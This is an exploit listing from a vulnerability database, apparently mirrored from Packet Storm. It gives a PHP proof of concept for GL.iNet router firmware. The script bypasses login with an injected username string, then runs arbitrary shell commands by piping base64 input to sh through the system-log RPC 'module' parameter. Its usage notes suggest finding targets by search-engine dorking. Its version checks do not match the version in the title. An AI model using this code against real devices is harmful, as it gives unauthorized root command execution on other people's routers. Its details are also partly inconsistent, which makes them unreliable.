Exploit for GL.iNet 4.4.3 Code Injection

Name: Exploit for GL.iNet 4.4.3 Code Injection
Rating: 5 (226 reviews)
2024-10-11 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182150
=============================================================================================================================================  
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.gl-inet.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 158 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class GlinetExploit  
{  
private $targetUri;  
private $sid;  
private $glinet;  
  
public function __construct($targetUri)  
{  
$this->targetUri = $targetUri;  
$this->glinet = [  
'model' => null,  
'firmware' => null,  
'arch' => null  
];  
}  
  
private function send_request($method, $uri, $data = null, $headers = [])  
{  
$ch = curl_init();  
  
$options = [  
CURLOPT_URL => $this->targetUri . $uri,  
CURLOPT_RETURNTRANSFER => true,  
CURLOPT_CUSTOMREQUEST => $method  
];  
  
if ($data) {  
$options[CURLOPT_POSTFIELDS] = $data;  
$headers[] = 'Content-Type: application/json';  
}  
  
curl_setopt_array($ch, $options);  
$response = curl_exec($ch);  
curl_close($ch);  
  
return $response ? json_decode($response, true) : null;  
}  
  
public function check_vuln_version()  
{  
$postData = json_encode([  
'jsonrpc' => '2.0',  
'id' => rand(1000, 9999),  
'method' => 'call',  
'params' => ['', 'ui', 'check_initialized', []]  
]);  
  
$res = $this->send_request('POST', '/rpc', $postData);  
if ($res && isset($res['result'])) {  
$this->glinet['model'] = $res['result']['model'];  
$this->glinet['firmware'] = $res['result']['firmware_version'];  
}  
  
// Check for vulnerable models and firmware  
switch ($this->glinet['model']) {  
case 'sft1200':  
$this->glinet['arch'] = 'mipsle';  
return version_compare($this->glinet['firmware'], '4.3.6', '==');  
case 'ar750':  
case 'ar750s':  
$this->glinet['arch'] = 'mipsbe';  
return version_compare($this->glinet['firmware'], '4.3.7', '==');  
// Add more cases as per your requirement  
}  
  
return false;  
}  
  
public function auth_bypass()  
{  
if (!empty($this->sid)) {  
return $this->sid;  
}  
  
$postData = json_encode([  
'jsonrpc' => '2.0',  
'id' => rand(1000, 9999),  
'method' => 'challenge',  
'params' => ['username' => 'root']  
]);  
  
$res = $this->send_request('POST', '/rpc', $postData);  
  
if ($res && isset($res['result']['nonce'])) {  
$nonce = $res['result']['nonce'];  
  
$username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";  
$pw = '0';  
$hash = md5("$username:$pw:$nonce");  
  
$postData = json_encode([  
'jsonrpc' => '2.0',  
'id' => rand(1000, 9999),  
'method' => 'login',  
'params' => [  
'username' => $username,  
'hash' => $hash  
]  
]);  
  
$res = $this->send_request('POST', '/rpc', $postData);  
  
if ($res && isset($res['result']['sid'])) {  
$this->sid = $res['result']['sid'];  
return $this->sid;  
}  
}  
  
return null;  
}  
  
public function execute_command($cmd)  
{  
$payload = base64_encode($cmd);  
$cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";  
  
$postData = json_encode([  
'jsonrpc' => '2.0',  
'id' => rand(1000, 9999),  
'method' => 'call',  
'params' => [  
$this->sid,  
'logread',  
'get_system_log',  
['lines' => '', 'module' => "|{$cmd}"]  
]  
]);  
  
return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);  
}  
  
public function check()  
{  
if ($this->check_vuln_version()) {  
return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";  
}  
  
return 'Not Vulnerable';  
}  
  
public function exploit($command)  
{  
$this->sid = $this->auth_bypass();  
  
if ($this->sid) {  
echo "SID: {$this->sid}\n";  
echo "Executing: {$command}\n";  
$this->execute_command($command);  
} else {  
echo "Authentication bypass failed.\n";  
}  
}  
}  
  
// Usage  
$exploit = new GlinetExploit('https://target-url');  
$exploit->exploit('ls');  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================